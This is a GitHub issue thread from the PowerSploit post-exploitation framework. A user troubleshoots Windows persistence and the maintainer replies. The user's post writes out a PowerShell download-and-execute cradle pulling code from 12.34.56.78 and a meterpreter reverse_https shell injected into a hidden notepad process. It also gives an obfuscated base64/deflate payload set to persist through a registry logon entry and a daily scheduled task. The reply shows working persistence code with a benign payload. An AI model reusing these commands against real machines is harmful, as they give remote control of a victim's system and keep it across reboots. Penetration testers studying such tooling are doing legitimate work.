search

PowerShellMafia / PowerSploit

PowerSploit - A PowerShell Post-Exploitation Framework
Other
11.87k stars 4.61k forks source link

Issue with Persistence on Windows 8.1 x64 #81

Closed GarrettVD closed 8 years ago

GarrettVD commented 9 years ago

Having some difficulty getting persistence to work properly. My payload doesn't appear to be executing at the specified times (Logon / Daily).

The scenario is this: I have a .bat file which executes the following:

@ECHO ON
%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -Exec ByPass -Nol -Command "IEX (New-Object Net.WebClient).DownloadString('http://12.34.56.78/payload')

http://12.34.56.78/payload is simply two modules combined into one file (Persistence.psm1 + Invoke--Shellcode.ps1) with my actual payload tacked onto the very end, which simply starts a notepad.exe process and invokes a windows/meterpreter/reverse_https on that instance:

# ...Contents of Persistence.psm1 + Invoke--Shellcode here...
$app = Start-Process C:\Windows\SysWOW64\notepad.exe -WindowStyle Hidden -PassThru
Invoke-Shellcode -ProcessId $app.Id -Payload windows/meterpreter/reverse_https -Lhost 12.34.56.78 -Lport 8443 -Force -Verbose

The above works perfectly when there is no persistence involved -- I execute the .bat file on my target Windows 8.1 x64 machine, and my metasploit multi/handler on 12.34.56.78 springs to life and a Meterpreter session opens.

But no such luck with persistence, and I have a feeling that I'm not quite getting this right...

What I'm doing is base-64 encoding my payload ("IEX (New-Object Net.WebClient).DownloadString('http://12.34.56.78/payload')") and plopping it onto the following PowerShell script, which generates the Persistence.ps1 and RemovePersistence.ps1 files, which subsequently appear to do nothing / fail to spawn a meterpreter instance when executed on my Windows 8.1 machine, immediately or upon user logon. :(

$p = {iex $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyAC4AMwA0AC4ANQA2AC4ANwA4AC8AcABhAHkAbABvAGEAZAAnACkA")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd()}"
IEX (New-Object Net.WebClient).DownloadString('http://12.34.56.78/modules')
$u = New-UserPersistenceOptions -Registry -AtLogon
$e = New-ElevatedPersistenceOptions -ScheduledTask -Daily -At '10:00 AM'
Add-Persistence -ScriptBlock $p -UserPersistenceOptions $u -ElevatedPersistenceOptions $e -Verbose -PassThru

Note that http://12.34.56.78/modules is the Persistence.psm1 + Invoke--Shellcode modules, without the meterpreter payload snippet. My train of thought there is, because I don't have PowerSploit installed on my target machine, they need to be loaded into memory? Maybe that's where the problem is.

Any ideas?

PowerShellMafia commented 8 years ago

I fixed a couple bugs that I found in Add-Persistence, FYI.

The following simple payload should work. Give it a try and let me know.

$Payload = { Get-Date | Out-File -FilePath "$($Env:TEMP)\date.txt" -Append }
$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -Daily -At '10:00 AM'
$UserOptions = New-UserPersistenceOption -Registry -AtLogon
$PersistencePayload = Add-Persistence -ScriptBlock $Payload -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -PassThru
Invoke-Expression $PersistencePayload